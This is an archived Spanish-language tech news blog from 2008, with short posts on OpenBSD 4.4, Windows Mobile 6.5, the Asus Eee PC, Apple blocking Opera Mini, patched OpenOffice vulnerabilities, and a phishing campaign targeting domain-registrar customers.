Si usted utiliza cualquiera de los productos mencionados, le recomendamos no aceptar actualizaciones automáticas, al menos por ahora. Es de esperar que algunos de los fabricantes involucrados mejorarán sus mecanismos de autenticación para evitar este tipo de ataque.

Por ejemplo Apple parece haber reforzado estos mecanismos, aunque no han habido anuncios oficiales, al menos hasta el momento.
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

domingo, 2 de noviembre de 2008

¿Que distrubución de linux debo instalar?


No se que distro instalar en mi computadora, cual distribución debo instalar? Esas preguntas las puedes resolver contestando este corto y sencillo test. ;) http://www.zegeniestudios.net/ldc/index.php

sábado, 1 de noviembre de 2008

Windows Mobile 6.5

Parece ser que Windows Mobile 7 no será la próxima versión del sistema operativos para dispositivos móviles de Microsoft.

Todos creíamos que la próxima versión de Windows Mobile sería la 7, prevista para el segundo semestre del 2009.

Sin embargo Sanjay Jha , CEO de Motorola para dispositivos móviles, ha desvelado un dato ciertamente interesante.

Según Sanjay Jah su compañía tiene previsto que los primeros teléfonos basados en Windows Mobile 6.5 esten disponibles durante el segundo semestre de 2009, la misma fecha en la que supuestamente Microsoft tiene previsto haber ultimado el desarrollo de Windows Mobile 7.

No termina de quedar claro si estamos hablando de una actualización de Windows Mobile 6.1, de otro nombre para el ya anunciado Windows Mobile 7, o de un retraso del mismo.

Finalmente y a modo de anécdota señalar que Sanjay Jah también menció que su compañía tenía previsto lanzar un teléfono basado en Android para el año próximo.

OpenBSD 4.4 disponible


Instalar Open BSD en 5 minutos (youtube)


Acaba de ser liberada la versión 4.4 de OpenBSD, un estupendo sistema operativo libre basado en UNIX, portable, respetuoso con las normas y que incorpora seguridad proactiva y criptografía integrada

OpenBSD es desarrollado por voluntarios y está basado en BSD e incluye emulación de binarios para la mayoría de los programas de los sistemas SVR4 (Solaris), FreeBSD, Linux, BSD/OS, SunOS y HP-UX.

Pagina de downloads

ASUS promete un portátil de 200 dólares


Asus Eee PC 701 News Video



Asustek ha anunciado que tiene previsto para el año que viene lanzar un portátil Eee a un precio de que rondará los 200 dólares.

En una reunión con analistas, Jerry Shen, presidente de Asustek ha anunciado que su empresa lanzará el año que viene un Eee PC a un precio de 200 dólares.

Shen a afirmado también que los modelos de 7 y 8,9 pulgadas serán progresivamente sustituidos por uno de 10 pulgadas.

Y es que Asustek tiene bastante claro que su línea de negocio futura tiene que ir de la mano de portátiles de bajo coste. De hecho actualmente del volumen de ingresos de la compañía un 22% corresponden a exitoso Eee PC.

http://www.digitimes.com/news/a20081031PD209.html

Apple no permite el Opera Mini en el iPhone



Video de iPhone con Safari


En declaraciones al New York Times, Jon Stephenson von Tetzchner, cofundador de Opera y actual consejero delegado, ha confirmado lo que todo el mundo ya sospechaba, que Apple no les permite distribuir el navegador Opera Mini para iPhone porque supondría una competencia para Safari.

No es la primera vez que ello sucede, Apple controla férreamente las aplicaciones que están en AppStore.

Baste con recordar a Sun, que tras mostrar su disposición a desarrollar Java para iPhone, no pudo hacerlo ya que los términos legales en que se distribuye el kit de desarrollo de software para el iPhone excluían dicha posibilidad.

El GPS del iPhone es otro ejemplo mas, desperdiciado y sin apenas aplicaciones que saquen partido del mismo, a pesar de que TomTom ya anunció que estaba trabajando en una versión de su popular navegador adaptada al iPhone.

Finalmente y para no aburrir al personal la aplicación Podcaster, no autorizada, hubiese permitido a los usuarios del iPhone descargar directamente desde el teléfono todo tipo de podcasts de audio.

Vía
Libertad Digital

Dos vulnerabilidades en la rama 2.x de OpenOffice permiten ejecución de código

OpenOffice.org ha publicado una actualización para la rama 2.x de OpenOffice. Soluciona dos problemas de seguridad que podrían permitir a un atacante ejecutar código si se procesan documentos especialmente manipulados con una versión vulnerable.
* Uno de los fallos se trata de un desbordamiento de memoria intermedia basado en heap en el intérprete de ficheros EMF.

* El segundo fallo se debe a un desbordamiento de enteros a la hora de procesar registros META_ESCAPE en ficheros WMF.

Ambos fallos podrían permitir la ejecución de código arbitrario con los permisos del usuario bajo el que se usara la aplicación.

Ambos también, están relacionados con problemas a la hora de procesar el formato Windows Meta File y Extended (o Enhanced) Windows Metafile Format. Estos formatos de imagen se hicieron especialmente famosos a raíz de la vulnerabilidad descubierta a finales de 2005 en Microsoft Windows y que infectó a millones de usuarios.

La reciente versión 3.0 de OpenOffice no se ve afectada.

No se han dado detalles técnicos ni parece existir exploit público. Se
recomienda actualizar a la versión OpenOffice 2.4.2. Todas las
anteriores son vulnerables.

Fuente:
Hispasec

Phishing a entidades registrantes: ¿Necesitan los atacantes nuevos dominios?

Desde ayer se está produciendo una verdadera avalancha de correo basura que simula ser de registrantes reputados como Enom y Networksolutions. Bajo la excusa de que el domino está a punto de caducar, su objetivo es robar las contraseñas de clientes de registrantes y por tanto adueñarse de sus dominios. Ayer además se dio a conocer que ICANN ha retirado la licencia a Estdomains, uno de los registrantes supuestamente aliados con el mundo del malware... ¿Será que los atacantes andan escasos de dominios?
Se ha observado una avalancha de correos de tipo phishing. Esta vez no intentan simular portales de entidades bancarias, sino que están destinados a simular registrantes reputados de dominios como Enom y Networksolutions. El asunto del correo suele ser: "Attention: domain will be expired soon." En su interior en un cuidado inglés y en texto plano se avisa al usuario de que su domino está a punto de caducar y que debe visitar la web del registrante e introducir su usuario y contraseña para renovar el dominio. En otras ocasiones en el correo se habla de que a causa de un corte temporal en el servicio, es necesario que el usuario se autentique.

En cualquiera de los casos el enlace lleva a una página que simula fielmente el portal de Enom o Networksolutions. Los dominios (adquiridos para la ocasión y camuflados en dominios de tercer nivel) bajo los que se alojan estos phishing suelen tener la estructura:
www.enom.com.comXY.biz, o www.networksolutions.com.sysXY.mobi/ siendo XY números cualesquiera. Aunque esto puede cambiar en cualquier momento.

Si el usuario introduce en estas páginas sus datos, los atacantes podrán controlar el dominio que la víctima tenga contratado y redirigirlo limpiamente a cualquier otro servidor, que bien podría tratarse de otro phishing, o alojar en ese dominio malware. Al ser dominios "legítimos" del que los usuarios han perdido el control, el efecto es mucho más "creíble" para las potenciales víctimas que lo visiten.

Hacía tiempo que no se observaba una campaña tan virulenta contra dueños de domino. Por otro lado (o quizás está relacionado), el pasado martes ICANN eliminó a Estdomains de su lista de registrantes acreditados: ya no pueden ejercer más su función. Estdomains siempre ha estado bajo la sospecha de ser un registrante que se lleva bien con el crimen organizado en Internet. Una buena parte de los dominios contratados en esta empresa han servido y sirven para la difusión del malware 2.0 y todo tipo de actividades ilegales. Siempre se les ha acusado de ser excesivamente "tolerantes" con estas prácticas. ICANN en un movimiento sin precedentes (que ha sido muy aplaudido), ha anunciado en un comunicado público que debido a la eterna sospecha sobre Estdomains (ellos siempre han negado que toleren el abuso de sus dominios), les retira la licencia. Aunque Estdomains ha presentado alegaciones (en estonio) y el proceso está temporalmente parado en espera de que ICANN las estudie. El dueño de Esdomains ha estado en prisión anteriormente por fraudes con tarjetas de crédito.

De golpe, si Estdomains es verdaderamente cómplice de las mafias informáticas, estas se quedan sin un socio que les proporcione una parte de la infraestructura necesaria para alojar sus componentes de troyanos. Relacionando esta última campaña de phishing que pretende conseguir dominios y la suspensión de la licencia de Estdomains, se pueden plantear dudas: ¿Está la nueva campaña de phishing relacionada con esa pérdida repentina de su aliado, de los dominios alojados en Estdomains? ¿Es posible que necesiten nuevos dominios (conseguidos de cualquier forma) para tener una buena infraestructura en la que seguir operando? No podemos saberlo con certeza.

Lo más probable es que los atacantes se "muden" en breve a cualquier otro registrante (probablemente también ruso) que haga la vista gorda ante sus actividades, y sigan esparciendo malware en la Red.

A ICANN además, le queda el problema de recolocar todos esos dominios de Estdomains que siendo legítimos, ahora tienen que cambiar de registrante.

Fuente:
Hispasec

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)